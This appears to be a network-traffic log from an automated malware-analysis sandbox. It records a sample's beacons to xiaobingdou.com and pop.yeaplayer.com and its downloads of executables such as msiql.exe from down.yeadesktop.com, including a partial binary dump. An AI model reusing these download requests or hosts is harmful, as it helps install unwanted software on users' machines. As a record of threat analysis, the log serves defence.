GET /anzhuang.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1ODRCOEU1N0QzMzhBQzQ0N0E5N0ZEMjRCQTI3QzE2RDU1ODE4QkUyQkRCNjk5M0EyQkUzQkUxMzY4NjdEQTcyQkU= HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:24 GMT

Connection: close

Content-Length: 0

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:41 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:30 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /iplookup/iplookup.php HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: int.dpool.sina.com.cn


HTTP/1.1 200 OK

Server: Sina

Date: Wed, 16 Aug 2017 14:40:18 GMT

Content-Type: text/html; charset=gbk

Content-Length: 20

Connection: close

DPOOL_HEADER: tyr105

Set-Cookie: INTDPOOL=dc04044687467eb79001316b5643db06;Path=/

POOLPOOL: intdpool

DPOOL_LB7_HEADER: apollo220

1.-1.-1...............

GET /upgrade/popwndup.exe HTTP/1.0

User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Host: down.yeadesktop.com

Accept: */*

Connection: Keep-Alive


HTTP/1.1 404 Not Found

Date: Wed, 16 Aug 2017 14:40:23 GMT

Content-Type: text/html

Connection: close

Set-Cookie: __cfduid=d701b8255597cf4961a559e74a22b2c391502894423; expires=Thu, 16-Aug-18 14:40:23 GMT; path=/; domain=.yeadesktop.com; HttpOnly

Server: cloudflare-nginx

CF-RAY: 38f5260211b18b70-KBP
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=gb2312"/>..<title>404 - ..
................</title>..<style type="text/css">..<!--
..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, 
sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} .
.h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0
;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;
} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family
:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#55
5555;}..#content{margin:0 0 0 2%;position:relative;}...content-contain
er{background:#FFF;width:96%;margin-top:8px;padding:10px;position:rela
tive;}..-->..</style>..</head>..<body>..<div i
d="header"><h1>..........</h1></div>..<div id=
"content">.. <div class="content-container"><fieldset>.
.  <h2>404 - ..................</h2>..  <h3>........
..............................................</h3>.. </field
set></div>..</div>..</body>..</html>....<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:26 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:33 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:36 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:28 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:23 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:27 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /offer/msiql.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: down.yeadesktop.com

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden

Date: Wed, 16 Aug 2017 14:40:21 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: max-age=10

Expires: Wed, 16 Aug 2017 14:40:31 GMT

X-Frame-Options: SAMEORIGIN

Server: cloudflare-nginx

CF-RAY: 38f525f470288ac8-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html 
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]..<<< skipped >>>

GET /offer/msiql.exe HTTP/1.1

User-Agent: Agent336712

Host: down.yeadesktop.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Wed, 16 Aug 2017 14:40:20 GMT

Content-Type: application/octet-stream

Content-Length: 2072576

Connection: keep-alive

Set-Cookie: __cfduid=d925b57e7ca3561034abea56a5bcf1b0a1502894419; expires=Thu, 16-Aug-18 14:40:19 GMT; path=/; domain=.yeadesktop.com; HttpOnly

Last-Modified: Wed, 10 May 2017 03:19:50 GMT

Accept-Ranges: bytes

ETag: "3072ec483cc9d21:0"

Server: cloudflare-nginx

CF-RAY: 38f525ebb64883f4-KBP
MZ......................@................................... .........
..!..L.!This program cannot be run in DOS mode....$.......p...4.k]4.k]
4.k]=..]5.k]I..]6.k]I..]..k]r..]<.k].L.]1.k]9..]..k]9..]..k]9..]#.k
]=..]&.k]=..]..k]4.j]..k].r.]..k].r.]e.k]9..]5.k]4..]5.k].r.]5.k]Rich4
.k]........PE..L...,..Y.....................L....................@....
......................`!...........@.................................l
...T........ ...................  ..4..@...8..........................
.`...@............................................text................
............... ..`.rdata..<...........................@..@.data...
`...........................@....rsrc.... .......,...>.............
.@..@.reloc...4...  ..6...j..............@..B.........................
......................................................................
......................................................................
......................................................................
.....................................................U...}..u..E......
}..u..E.P.M.Q..y........U.R.E.P........].......U..Q.E....M..U.....U..E
....M..U.....U...E...a|...M...z....U... .U...E...a|...M...z....U... .U
...E...u...E......8..M...u.......)..U...E.;.}........M...U.;.~........
.\.....].....U....,.}..t&.E.P.M.Q..4.....j..U.R.E.P.%..........j.j..M.
Q..........]...........U....<...VW.E..........Z... t.3.............
..............}..u.......Q.56........u...............U.......j..E.P...
...Q.52..................u.3.. .........R......P..................<<< skipped >>>

GET /offer/service.exe HTTP/1.1

User-Agent: Agent347835

Host: down.yeadesktop.com

Cache-Control: no-cache

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 404 Not Found

Date: Wed, 16 Aug 2017 14:40:30 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Server: cloudflare-nginx

CF-RAY: 38f5262fb17483f4-KBP
48b..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http
://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="ht
tp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Co
ntent-Type" content="text/html; charset=gb2312"/>..<title>404
 - ..................</title>..<style type="text/css">..&l
t;!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvet
ica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15p
x;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;mar
gin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#00
0000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-f
amily:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-colo
r:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-co
ntainer{background:#FFF;width:96%;margin-top:8px;padding:10px;position
:relative;}..-->..</style>..</head>..<body>..<
div id="header"><h1>..........</h1></div>..<di
v id="content">.. <div class="content-container"><fieldset
>..  <h2>404 - ..................</h2>..  <h3>...
...................................................</h3>.. </
fieldset></div>..</div>..</body>..</html>..
0..

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:34 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:35 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1ODUyM0QwODA1RTU4N0M3NzE4OUFFQTE1RDdDN0JGRTFBQjAyOEM3NTUxNkJCNzU1RDEzRjUzNzg5QkRFRTBBOThEMzlDQTZGRDYyNzA1MzI0RjIwNThCQTJFRkY3NDY2NjM1MTBDMUQxQ0Q0NUZFRDREQ0U5M0Y4MzZDMzhCM0Ez HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:26 GMT

Connection: close

Content-Length: 0

GET /offer/msiql.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: down.yeadesktop.com

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden

Date: Wed, 16 Aug 2017 14:40:20 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: max-age=10

Expires: Wed, 16 Aug 2017 14:40:30 GMT

X-Frame-Options: SAMEORIGIN

Server: cloudflare-nginx

CF-RAY: 38f525efc70783f4-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html 
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]-->.<!--[if gte IE 10]><!--><script t
ype="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></scri
pt><!--<![endif]-->.<script type="text/javascript" <<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:28 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
